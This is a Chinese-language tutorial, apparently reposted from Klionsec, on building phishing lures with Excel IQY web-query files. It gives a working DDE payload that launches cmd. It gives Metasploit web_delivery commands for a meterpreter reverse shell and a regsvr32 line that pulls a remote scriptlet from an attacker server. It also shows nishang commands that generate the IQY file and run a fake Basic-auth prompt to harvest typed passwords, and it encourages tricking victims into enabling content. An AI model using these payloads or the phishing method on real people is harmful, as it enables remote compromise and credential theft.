标签:style start https ica 计算机 mon 启用 sign 服务
操作系统:windows7
microsoft office版本:office 2010
可以将IYQ简单的理解成内置在excel中的一种特殊‘web浏览器’(不能加载脚本),通过IQY【即web查询】语句,可以直接将各类web上的列表数据轻松引入到当前的excel中,而正是因为这样,从而给了我们利用excel制作钓鱼邮件的机会,假如你要引入的web数据是入侵者事先准备好的一段payload iqy恶意代码,那结果就不言而喻了。
点击确定
导入成功后的效果
# IYQ代码
=cmd|‘/c calc.exe ‘!A0
检验一下正常访问
再比之前多了一步确认操作
这一步需要额外用到的工具如下:
msf > use exploit/multi/script/web_delivery
msf > set target 3
msf > set payload windows/meterpreter/reverse_tcp_rc4_dns
msf > set lhost 192.168.3.29
msf > set lport 53
msf > set rc4password secquan.org
msf > exploit -j
(iqy文件本身的内容很简单,只有一个包含恶意payload的url:http://192.168.80.131/meter.html ,关键也就在这个 html,我们需要把 html 的内容换成加载我们上面准备好的 meterpreter payload 的 iqy 语句 :regsvr32 /s /n /u /i:http://192.168.80.131:8080/ZXMgstpzpYQCJ.sct scrobj.dll),具体操作如下:
powershell –exec bypass –Command "& {Import-Module ‘C:\tools\nishang\Client\Out-WebQuery.ps1‘;Out-WebQuery -URL http://192.168.80.131/meter.html}"
命令成功执行过后,会新生成一个iqy文件
root@kali:~# /etc/init.d/apache2 start
[ ok ] Starting apache2 (via systemctl): apache2.service.
root@kali:~# cd /var/www/html/
root@kali:/var/www/html# vim meter.html
root@kali:/var/www/html# cat meter.html
=cmd|‘/c regsvr32 /s /n /u /i:http://192.168.80.131:8080/ZXMgstpzpYQCJ.sct scrobj.dll ‘!A0
一旦他正常双击打开[默认会调用 excel 来打开],便会弹出如下的安全警告框,至于怎么让他去点‘ enable ‘就需要用心好好琢磨下了
因为我们前面的 iqy 是用 cmd 执行的,所以这里它会问你是否要启动 cmd.exe,只要目标点击‘ 是‘,我们的 meterpreter 即会正常上线,具体如下
powershell –exec bypass –Command "& {Import-Module ‘C:\tools\nishang\Client\Out-WebQuery.ps1‘;Out-WebQuery -URL http://192.168.80.129/}"
C:\>powershell -exec bypass
PS C:\> cd C:\tools\nishang\Utility
PS C:\tools\nishang\Utility> Import-Module .\Start-CaptureServer.ps1
PS C:\tools\nishang\Utility> Start-CaptureServer -AuthType Basic -IPAddress 192.168.80.129 -LogFilePath C:\windows\temp\log.txt #注意此处的认证要选择基础认证,监听的 ip 和上面生成 iqy 文件中的 ip 一致,通常都是本机 i
如果被禁止执行ps1脚本,先执行set-ExecutionPolicy RemoteSigned
点击启用
诱使输入账号密码
《利用 IQY特性高效钓鱼》--By Klionsec
标签:style start https ica 计算机 mon 启用 sign 服务
原文地址:https://www.cnblogs.com/ldhbetter/p/10893535.html